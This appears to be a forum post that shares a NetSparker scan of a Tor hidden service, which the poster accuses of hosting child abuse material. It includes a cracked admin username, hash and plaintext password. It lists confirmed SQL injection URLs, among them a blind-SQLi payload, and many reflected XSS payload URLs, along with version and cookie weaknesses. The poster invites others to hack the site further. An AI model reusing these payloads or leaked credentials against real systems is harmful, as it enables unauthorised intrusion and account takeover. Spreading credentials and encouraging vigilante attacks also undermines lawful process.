SQLi: http://pedoartre6ookiff.onion/pages/video.php?id=' OR 'ns'='ns Account password 'admin' was fortunately in one of my dictionaries, so I attach the report. It is common MD5, they did not try to escape salt and other entries will follow. username: blaatje123 role: admin md5: 5416d7cd6ef195a0f7622a9c56b55e84 password: 1q2w3e4r He would like some tips on the fault and totally dirty hack these web pages might follow. Is there too much objectionable content, photos and videos are downright disgusting. Activities of people who are busy with the creation of websites should be prosecuted in any country of the world. report NetSparker <img src='http://www.toolbase.bz/board/public/style_emoticons/<#EMO_DIR#>/0007.png' class='bbc_emoticon' alt=':)' /> |||| - Boolean Based SQL Injection - |||| Severity: Critical Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/pages/video.php?id=' OR 'ns'='ns Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98 Parameter Name: id Parameter Type: Querystring Attack Pattern: ' OR 'ns'='ns |||| - XSS (Cross-site Scripting) - |||| Severity: Important Confirmation: Confirmed Vulnerable URL : http://pedoartre6ookiff.onion/index.php?'"--></style></script><script>alert(0x000062)</script> Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 Parameter Name: Query Based Parameter Type: FullQueryString Attack Pattern: '"--></style></script><script>alert(0x000062)</script> Severity: Important Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/?'"--></style></script><script>alert(0x000064)</script> Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 Parameter Name: Query Based Parameter Type: FullQueryString Attack Pattern: '"--></style></script><script>alert(0x000064)</script> Severity: Important Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/index.php?=3&page='"--></style></script><script>alert(0x0000D7)</script> Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 Parameter Name: page Parameter Type: Querystring Attack Pattern: '"--></style></script><script>alert(0x0000D7)</script> Severity: Important Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/index.php?=3&page='"--></style></script><script>alert(0x0000D7)</script> Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 Parameter Name: page Parameter Type: Querystring Attack Pattern: '"--></style></script><script>alert(0x0000D7)</script> Severity: Important Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/index.php?=3&page='"--></style></script><script>alert(0x000317)</script>&cat[]=1&duration=0-180&genre[]=1&max_age=3&min_age=3&search=1&searchstring=3 Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 Parameter Name: page Parameter Type: Querystring Attack Pattern: '"--></style></script><script>alert(0x000317)</script> Severity: Important Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/?=3&page='"--></style></script><script>alert(0x000339)</script>&cat[]=1&duration=0-180&genre[]=1&max_age=3&min_age=3&search=1&searchstring=3 Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 Parameter Name: page Parameter Type: Querystring Attack Pattern: '"--></style></script><script>alert(0x000339)</script> Severity: Important Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/?cat[]=1&duration=0-180&genre[]=1&max_age=3&min_age=3&search=1&searchstring=3&page='"--></style></script><script>alert(0x0004CD)</script> Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 Parameter Name: page Parameter Type: Querystring Attack Pattern: '"--></style></script><script>alert(0x0004CD)</script> Severity: Important Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/index.php?cat[]=1&duration=0-180&genre[]=1&max_age=3&min_age=3&search=1&searchstring=3&page='"--></style></script><script>alert(0x000586)</script> Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 Parameter Name: page Parameter Type: Querystring Attack Pattern: '"--></style></script><script>alert(0x000586)</script> |||| - Password Transmitted Over HTTP - |||| Severity: Important Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/login/login.php Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319 Form target action: ?action=login |||| - PHP Version Disclosure - |||| Severity: Low Confirmation: Confirmed Vulnerable URL : http://pedoartre6ookiff.onion/ Vulnerability Classifications: PCI 6.5.6 OWASP A6 Extracted Version: PHP/5.4.4-14+deb7u7 |||| - MySQL Database Identified - |||| Severity: Information Confirmation: Confirmed Vulnerable URL : http://pedoartre6ookiff.onion/pages/video.php?id=-486'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- Parameter Name: id Parameter Type: Querystring Attack Pattern: -486'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- |||| - Cookie Not Marked As HttpOnly - |||| Severity: Low Confirmation: Confirmed Vulnerable URL: http://pedoartre6ookiff.onion/ Vulnerability Classifications: OWASP A6 CWE-16 Identified Cookie: PHPSESSID
Gruss
Spic